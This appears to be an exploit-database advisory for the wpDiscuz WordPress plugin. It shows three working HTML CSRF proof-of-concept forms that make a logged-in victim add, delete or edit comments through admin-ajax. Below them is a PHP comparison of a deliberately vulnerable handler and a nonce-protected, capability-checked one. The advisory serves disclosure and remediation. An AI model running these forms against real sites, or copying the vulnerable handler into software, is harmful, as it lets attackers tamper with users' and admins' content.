## https://sploitus.com/exploit?id=WPEX-ID:2746101E-E993-42B9-BD6F-DFD5544FA3FE
To make the logged-in user add a comment:

```html
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdAddComment" />
      <input type="hidden" name="wc_comment" value="Comment added via CSRF" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="wpdiscuz_unique_id" value="dummy" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```


To delete a comment (CSRF against an admin):

```html
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdDeleteComment" />
      <input type="hidden" name="id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```


To edit a comment (CSRF against the user who made the comment, or against an admin to modify any comment):

```html
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdSaveEditedComment" />
      <input type="hidden" name="commentId" value="6" />
      <input type="hidden" name="wc_comment" value="Attacker CSRF" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
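All three forms work only because the admin-ajax handlers accept a plain POST with no nonce. As an added, illustrative example (not wpDiscuz's own code and not part of the original advisory), here is a WordPress AJAX delete handler in its CSRF-able form beside the hardened one; the hook name, nonce action and script handle are assumptions made for the illustration.

```php
<?php
// Illustrative WordPress admin-ajax handler (hypothetical, not the plugin's code).
// The fix the PoCs above rely on being absent: a nonce bound to the logged-in
// user's session, verified server-side, plus an explicit capability check.

// Vulnerable form: any page that can make the victim's browser submit a POST
// with the right fields gets the comment deleted in the victim's session.
function example_delete_comment_vulnerable() {
    $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
    wp_delete_comment( $id, true );
    wp_send_json_success();
}

// Hardened form: check_ajax_referer() compares the submitted nonce with one
// derived from the current user's session and dies with HTTP 403 when it is
// missing or invalid. A form hosted on another origin cannot obtain that value.
function example_delete_comment_hardened() {
    check_ajax_referer( 'example_delete_comment', 'nonce' );

    $id      = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
    $comment = get_comment( $id );
    // Authorisation is separate from CSRF protection: the caller must also be
    // allowed to act on this specific comment.
    if ( ! $comment || ! current_user_can( 'edit_comment', $comment->comment_ID ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_delete_comment( $comment->comment_ID, true );
    wp_send_json_success();
}
// Hook name is an assumption; it maps to action=example_delete_comment.
add_action( 'wp_ajax_example_delete_comment', 'example_delete_comment_hardened' );

// Client side: the nonce is generated when the page is rendered and handed to
// the site's own script (handle 'example-comments' assumed to be registered),
// which sends it back as the 'nonce' POST field with each request.
function example_enqueue_nonce() {
    wp_localize_script( 'example-comments', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_delete_comment' ),
    ) );
}
add_action( 'wp_enqueue_scripts', 'example_enqueue_nonce' );
```

The same pattern applies to the add and edit actions: every state-changing admin-ajax handler needs its own nonce check and a capability check against the specific object being changed.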